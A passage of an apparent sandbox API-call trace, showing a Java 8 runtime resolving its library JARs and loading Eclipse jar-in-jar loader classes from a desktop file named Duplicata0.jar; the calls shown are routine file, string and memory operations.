GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed10 | out: lpFileInformation=0x4bed10) returned 1 [0018.271] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.271] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar") returned 0x32 [0018.271] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar", lpFindFileData=0x4be234 | out: lpFindFileData=0x4be234) returned 0x24f930 [0018.271] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.271] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.271] wcslen (_String="charsets.jar") returned 0xc [0018.271] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar") returned 0x32 [0018.272] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar") returned 0x32 [0018.272] wcscpy (in: _Dest=0xb48b40, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar" [0018.272] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar", nBufferLength=0x9, lpBuffer=0x4bed20, lpFilePart=0x4bed1c | out: lpBuffer="", lpFilePart=0x4bed1c) returned 0x33 [0018.272] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed10 | out: lpFileInformation=0x4bed10) returned 1 [0018.273] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.273] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar") returned 0x2d [0018.273] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar", lpFindFileData=0x4be234 | out: lpFindFileData=0x4be234) returned 0x24f930 [0018.273] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.273] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.273] wcslen (_String="jfr.jar") returned 0x7 [0018.273] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar") returned 0x2d [0018.274] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar") returned 0x2d [0018.274] wcscpy (in: _Dest=0x15011dd8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar" [0018.274] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar", nBufferLength=0x9, lpBuffer=0x4bed20, lpFilePart=0x4bed1c | out: lpBuffer="", lpFilePart=0x4bed1c) returned 0x2e [0018.274] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed10 | out: lpFileInformation=0x4bed10) returned 1 [0018.274] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\classes") returned 0x29 [0018.274] _wfullpath (in: _Buffer=0xb9a2d8, _Path="C:\\Program Files\\Java\\jre1.8.0_92\\classes", _BufferCount=0x400 | out: _Buffer="C:\\Program Files\\Java\\jre1.8.0_92\\classes") returned="C:\\Program Files\\Java\\jre1.8.0_92\\classes" [0018.275] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\classes") returned 0x29 [0018.275] wcsncmp (_String1="C:\\Program Files\\Java\\jre1.8.0_92\\classes", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0018.275] wcslen (_String="C:\\Program Files") returned 0x10 [0018.275] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x4be280 | out: lpFindFileData=0x4be280) returned 0x24f930 [0018.275] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.275] wcslen (_String="Program Files") returned 0xd [0018.275] wcslen (_String="C:\\Program Files\\Java") returned 0x15 [0018.275] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x4be280 | out: lpFindFileData=0x4be280) returned 0x24f930 [0018.275] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.275] wcslen (_String="Java") returned 0x4 [0018.275] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92") returned 0x21 [0018.275] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92", lpFindFileData=0x4be280 | out: lpFindFileData=0x4be280) returned 0x24f930 [0018.276] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.276] wcslen (_String="jre1.8.0_92") returned 0xb [0018.276] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\classes") returned 0x29 [0018.276] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\classes", lpFindFileData=0x4be280 | out: lpFindFileData=0x4be280) returned 0xffffffff [0018.276] GetLastError () returned 0x2 [0018.276] wcslen (_String="\\classes") returned 0x8 [0018.276] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\classes") returned 0x29 [0018.277] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\classes") returned 0x29 [0018.277] wcscpy (in: _Dest=0xb987a0, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\classes" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\classes") returned="C:\\Program Files\\Java\\jre1.8.0_92\\classes" [0018.277] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\classes", nBufferLength=0x9, lpBuffer=0x4becb0, lpFilePart=0x4becac | out: lpBuffer="", lpFilePart=0x4becac) returned 0x2a [0018.277] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\classes", fInfoLevelId=0x0, lpFileInformation=0x4beca0 | out: lpFileInformation=0x4beca0) returned 0 [0018.277] GetLastError () returned 0x2 [0018.277] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\classes") returned 0x29 [0018.277] wcscpy (in: _Dest=0xb987a0, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\classes" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\classes") returned="C:\\Program Files\\Java\\jre1.8.0_92\\classes" [0018.277] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\classes", nBufferLength=0x9, lpBuffer=0x4bed20, lpFilePart=0x4bed1c | out: lpBuffer="", lpFilePart=0x4bed1c) returned 0x2a [0018.277] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\classes", fInfoLevelId=0x0, lpFileInformation=0x4bed10 | out: lpFileInformation=0x4bed10) returned 0 [0018.277] GetLastError () returned 0x2 [0018.278] strlen (_Str="sun/net/www/protocol/jar/Handler") returned 0x20 [0018.282] strlen (_Str="java/util/Enumeration") returned 0x15 [0018.283] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar") returned 0x33 [0018.283] wcscpy (in: _Dest=0x15011e48, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar" [0018.283] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar", nBufferLength=0x9, lpBuffer=0x4bf110, lpFilePart=0x4bf10c | out: lpBuffer="", lpFilePart=0x4bf10c) returned 0x34 [0018.283] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar", fInfoLevelId=0x0, lpFileInformation=0x4bf100 | out: lpFileInformation=0x4bf100) returned 1 [0018.285] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar") returned 0x2c [0018.285] wcscpy (in: _Dest=0x15011dd8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar" [0018.285] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar", nBufferLength=0x9, lpBuffer=0x4bf110, lpFilePart=0x4bf10c | out: lpBuffer="", lpFilePart=0x4bf10c) returned 0x2d [0018.285] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar", fInfoLevelId=0x0, lpFileInformation=0x4bf100 | out: lpFileInformation=0x4bf100) returned 1 [0018.287] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar") returned 0x34 [0018.287] wcscpy (in: _Dest=0x15011dd8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar" [0018.288] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar", nBufferLength=0x9, lpBuffer=0x4bebc0, lpFilePart=0x4bebbc | out: lpBuffer="", lpFilePart=0x4bebbc) returned 0x35 [0018.288] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar", fInfoLevelId=0x0, lpFileInformation=0x4bebb0 | out: lpFileInformation=0x4bebb0) returned 0 [0018.288] GetLastError () returned 0x2 [0018.291] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar") returned 0x2e [0018.291] wcscpy (in: _Dest=0x15011dd8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar" [0018.291] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar", nBufferLength=0x9, lpBuffer=0x4bf110, lpFilePart=0x4bf10c | out: lpBuffer="", lpFilePart=0x4bf10c) returned 0x2f [0018.291] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar", fInfoLevelId=0x0, lpFileInformation=0x4bf100 | out: lpFileInformation=0x4bf100) returned 1 [0018.293] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar") returned 0x2d [0018.293] wcscpy (in: _Dest=0x15011dd8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar" [0018.293] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar", nBufferLength=0x9, lpBuffer=0x4bf110, lpFilePart=0x4bf10c | out: lpBuffer="", lpFilePart=0x4bf10c) returned 0x2e [0018.293] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar", fInfoLevelId=0x0, lpFileInformation=0x4bf100 | out: lpFileInformation=0x4bf100) returned 1 [0018.294] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar") returned 0x32 [0018.295] wcscpy (in: _Dest=0xb48b40, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar" [0018.295] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar", nBufferLength=0x9, lpBuffer=0x4bf110, lpFilePart=0x4bf10c | out: lpBuffer="", lpFilePart=0x4bf10c) returned 0x33 [0018.295] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar", fInfoLevelId=0x0, lpFileInformation=0x4bf100 | out: lpFileInformation=0x4bf100) returned 1 [0018.296] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar") returned 0x2d [0018.296] wcscpy (in: _Dest=0x15011dd8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar" [0018.296] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar", nBufferLength=0x9, lpBuffer=0x4bf110, lpFilePart=0x4bf10c | out: lpBuffer="", lpFilePart=0x4bf10c) returned 0x2e [0018.296] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar", fInfoLevelId=0x0, lpFileInformation=0x4bf100 | out: lpFileInformation=0x4bf100) returned 1 [0018.298] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\classes") returned 0x29 [0018.298] wcscpy (in: _Dest=0xb98a78, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\classes" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\classes") returned="C:\\Program Files\\Java\\jre1.8.0_92\\classes" [0018.298] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\classes", nBufferLength=0x9, lpBuffer=0x4bebc0, lpFilePart=0x4bebbc | out: lpBuffer="", lpFilePart=0x4bebbc) returned 0x2a [0018.298] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\classes", fInfoLevelId=0x0, lpFileInformation=0x4bebb0 | out: lpFileInformation=0x4bebb0) returned 0 [0018.298] GetLastError () returned 0x2 [0018.301] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6921, lpNewFilePointer=0x0, dwMoveMethod=0x4becc8 | out: lpNewFilePointer=0x0) returned 1 [0018.301] ReadFile (in: hFile=0x1c4, lpBuffer=0xacb010, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bec98, lpOverlapped=0x0 | out: lpBuffer=0xacb010*, lpNumberOfBytesRead=0x4bec98*=0xa0, lpOverlapped=0x0) returned 1 [0018.305] strlen (_Str="java/net/URL") returned 0xc [0018.314] wcslen (_String="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0018.314] wcscpy (in: _Dest=0xb98ce8, _Source="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" | out: _Dest="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" [0018.314] CreateFileW (lpFileName="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" (normalized: "c:\\users\\dssdpmx042\\desktop\\duplicata0.jar"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x1c8 [0018.314] GetFileTime (in: hFile=0x1c8, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x4bf5f0 | out: lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x4bf5f0*(dwLowDateTime=0x6a1d3200, dwHighDateTime=0x1d20216)) returned 1 [0018.314] CloseHandle (hObject=0x1c8) returned 1 [0018.314] _errno () returned 0xc1e118 [0018.314] strlen (_Str="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0018.314] strcpy (in: _Dest=0x4bf1e4, _Source="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" | out: _Dest="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" [0018.314] strcmp (_Str1="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar", _Str2="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0 [0018.317] calloc (_Count=0x1, _Size=0x38) returned 0xb9a2f0 [0018.318] strlen (_Str="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0x42 [0018.319] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6b16, lpNewFilePointer=0x0, dwMoveMethod=0x4be6b8 | out: lpNewFilePointer=0x0) returned 1 [0018.319] ReadFile (in: hFile=0x1c4, lpBuffer=0xacb010, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be688, lpOverlapped=0x0 | out: lpBuffer=0xacb010*, lpNumberOfBytesRead=0x4be688*=0xa0, lpOverlapped=0x0) returned 1 [0018.321] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x445, lpNewFilePointer=0x0, dwMoveMethod=0x4bc97c | out: lpNewFilePointer=0x0) returned 1 [0018.321] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bc9b4, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bc94c, lpOverlapped=0x0 | out: lpBuffer=0x4bc9b4*, lpNumberOfBytesRead=0x4bc94c*=0x1e, lpOverlapped=0x0) returned 1 [0018.321] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x4ab, lpNewFilePointer=0x0, dwMoveMethod=0x4bc9b8 | out: lpNewFilePointer=0x0) returned 1 [0018.321] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bca34, nNumberOfBytesToRead=0x160, lpNumberOfBytesRead=0x4bc988, lpOverlapped=0x0 | out: lpBuffer=0x4bca34*, lpNumberOfBytesRead=0x4bc988*=0x160, lpOverlapped=0x0) returned 1 [0018.323] calloc (_Count=0x100, _Size=0x4) returned 0xb9da98 [0018.323] calloc (_Count=0x1f7, _Size=0x2) returned 0xb9dea0 [0018.324] calloc (_Count=0x100, _Size=0x14) returned 0xb9e298 [0018.324] strlen (_Str="java/lang/Object") returned 0x10 [0018.324] strcpy (in: _Dest=0xb5f0a0, _Source="java/lang/Object" | out: _Dest="java/lang/Object") returned="java/lang/Object" [0018.324] strlen (_Str="java/lang/String") returned 0x10 [0018.324] strcpy (in: _Dest=0xb5f080, _Source="java/lang/String" | out: _Dest="java/lang/String") returned="java/lang/String" [0018.324] strlen (_Str="java/lang/Throwable") returned 0x13 [0018.324] strcpy (in: _Dest=0xb5f060, _Source="java/lang/Throwable" | out: _Dest="java/lang/Throwable") returned="java/lang/Throwable" [0018.324] strlen (_Str="java/lang/Cloneable") returned 0x13 [0018.324] strcpy (in: _Dest=0xb5f040, _Source="java/lang/Cloneable" | out: _Dest="java/lang/Cloneable") returned="java/lang/Cloneable" [0018.324] strlen (_Str="java/io/Serializable") returned 0x14 [0018.324] strcpy (in: _Dest=0xb5f020, _Source="java/io/Serializable" | out: _Dest="java/io/Serializable") returned="java/io/Serializable" [0018.324] strlen (_Str="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0x42 [0018.324] strcpy (in: _Dest=0x15011f90, _Source="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo" | out: _Dest="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo" [0018.324] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.324] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.325] strcmp (_Str1="", _Str2="") returned 0 [0018.325] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.325] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.325] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.325] strlen (_Str="") returned 0x0 [0018.326] strlen (_Str="@") returned 0x1 [0018.326] strlen (_Str="") returned 0x0 [0018.326] strcmp (_Str1="", _Str2="") returned 0 [0018.326] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.326] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.326] strlen (_Str="") returned 0x0 [0018.327] strlen (_Str="@") returned 0x1 [0018.327] strlen (_Str="") returned 0x0 [0018.328] strlen (_Str="java/util/jar/Manifest") returned 0x16 [0018.329] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x4bd41c | out: lpNewFilePointer=0x0) returned 1 [0018.329] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bd454, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bd3ec, lpOverlapped=0x0 | out: lpBuffer=0x4bd454*, lpNumberOfBytesRead=0x4bd3ec*=0x1e, lpOverlapped=0x0) returned 1 [0018.329] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x36, lpNewFilePointer=0x0, dwMoveMethod=0x4bd458 | out: lpNewFilePointer=0x0) returned 1 [0018.329] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bd4d4, nNumberOfBytesToRead=0x7b, lpNumberOfBytesRead=0x4bd428, lpOverlapped=0x0 | out: lpBuffer=0x4bd4d4*, lpNumberOfBytesRead=0x4bd428*=0x7b, lpOverlapped=0x0) returned 1 [0018.331] strlen (_Str="java/util/jar/Attributes") returned 0x18 [0018.332] strlen (_Str="java/util/ArrayList") returned 0x13 [0018.362] strlen (_Str="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned 0x43 [0018.363] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6cd2, lpNewFilePointer=0x0, dwMoveMethod=0x4be6f8 | out: lpNewFilePointer=0x0) returned 1 [0018.363] ReadFile (in: hFile=0x1c4, lpBuffer=0xacb010, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be6c8, lpOverlapped=0x0 | out: lpBuffer=0xacb010*, lpNumberOfBytesRead=0x4be6c8*=0xa0, lpOverlapped=0x0) returned 1 [0018.366] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x16e6, lpNewFilePointer=0x0, dwMoveMethod=0x4bc9bc | out: lpNewFilePointer=0x0) returned 1 [0018.366] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bc9f4, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bc98c, lpOverlapped=0x0 | out: lpBuffer=0x4bc9f4*, lpNumberOfBytesRead=0x4bc98c*=0x1e, lpOverlapped=0x0) returned 1 [0018.367] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x174d, lpNewFilePointer=0x0, dwMoveMethod=0x4bc9f8 | out: lpNewFilePointer=0x0) returned 1 [0018.367] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bca74, nNumberOfBytesToRead=0x231, lpNumberOfBytesRead=0x4bc9c8, lpOverlapped=0x0 | out: lpBuffer=0x4bca74*, lpNumberOfBytesRead=0x4bc9c8*=0x231, lpOverlapped=0x0) returned 1 [0018.369] calloc (_Count=0x100, _Size=0x4) returned 0x1501a108 [0018.369] calloc (_Count=0x1f7, _Size=0x2) returned 0xb9d2b0 [0018.369] calloc (_Count=0x100, _Size=0x14) returned 0xb9d6a8 [0018.369] strlen (_Str="java/lang/Object") returned 0x10 [0018.369] strcpy (in: _Dest=0xb5f0e0, _Source="java/lang/Object" | out: _Dest="java/lang/Object") returned="java/lang/Object" [0018.369] strlen (_Str="java/lang/String") returned 0x10 [0018.369] strcpy (in: _Dest=0xb5f020, _Source="java/lang/String" | out: _Dest="java/lang/String") returned="java/lang/String" [0018.369] strlen (_Str="java/lang/Throwable") returned 0x13 [0018.369] strcpy (in: _Dest=0xb5f040, _Source="java/lang/Throwable" | out: _Dest="java/lang/Throwable") returned="java/lang/Throwable" [0018.369] strlen (_Str="java/lang/Cloneable") returned 0x13 [0018.369] strcpy (in: _Dest=0xb5f060, _Source="java/lang/Cloneable" | out: _Dest="java/lang/Cloneable") returned="java/lang/Cloneable" [0018.369] strlen (_Str="java/io/Serializable") returned 0x14 [0018.369] strcpy (in: _Dest=0xb5f080, _Source="java/io/Serializable" | out: _Dest="java/io/Serializable") returned="java/io/Serializable" [0018.369] strlen (_Str="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned 0x43 [0018.369] strcpy (in: _Dest=0x1501a510, _Source="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory" | out: _Dest="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory" [0018.369] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.370] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.371] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned 0 [0018.371] strlen (_Str="java/net/URLStreamHandlerFactory") returned 0x20 [0018.371] strcpy (in: _Dest=0xb4d608, _Source="java/net/URLStreamHandlerFactory" | out: _Dest="java/net/URLStreamHandlerFactory") returned="java/net/URLStreamHandlerFactory" [0018.371] strlen (_Str="") returned 0x0 [0018.371] strlen (_Str="") returned 0x0 [0018.371] strcmp (_Str1="java/net/URLStreamHandlerFactory", _Str2="java/net/URLStreamHandlerFactory") returned 0 [0018.371] strlen (_Str="AA") returned 0x2 [0018.371] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned 0 [0018.371] strlen (_Str="") returned 0x0 [0018.372] strcmp (_Str1="equals", _Str2="") returned 1 [0018.372] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.372] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.372] strlen (_Str="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler") returned 0x3c [0018.372] strcpy (in: _Dest=0x15010d08, _Source="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler" | out: _Dest="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler") returned="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler" [0018.372] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned 0 [0018.372] strcmp (_Str1="", _Str2="") returned 0 [0018.372] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler") returned 0 [0018.372] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler") returned 0 [0018.372] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned 0 [0018.372] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned 0 [0018.373] strcmp (_Str1="createURLStreamHandler", _Str2="") returned 1 [0018.373] strcmp (_Str1="java/net/URLStreamHandlerFactory", _Str2="java/net/URLStreamHandlerFactory") returned 0 [0018.373] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.373] strlen (_Str="java/net/URLStreamHandler") returned 0x19 [0018.373] strcpy (in: _Dest=0xace638, _Source="java/net/URLStreamHandler" | out: _Dest="java/net/URLStreamHandler") returned="java/net/URLStreamHandler" [0018.373] strlen (_Str="") returned 0x0 [0018.373] strlen (_Str="") returned 0x0 [0018.373] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.373] strlen (_Str="AA") returned 0x2 [0018.373] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.374] strlen (_Str="I") returned 0x1 [0018.374] strlen (_Str="") returned 0x0 [0018.374] strlen (_Str="1") returned 0x1 [0018.374] strlen (_Str="") returned 0x0 [0018.374] strlen (_Str="A") returned 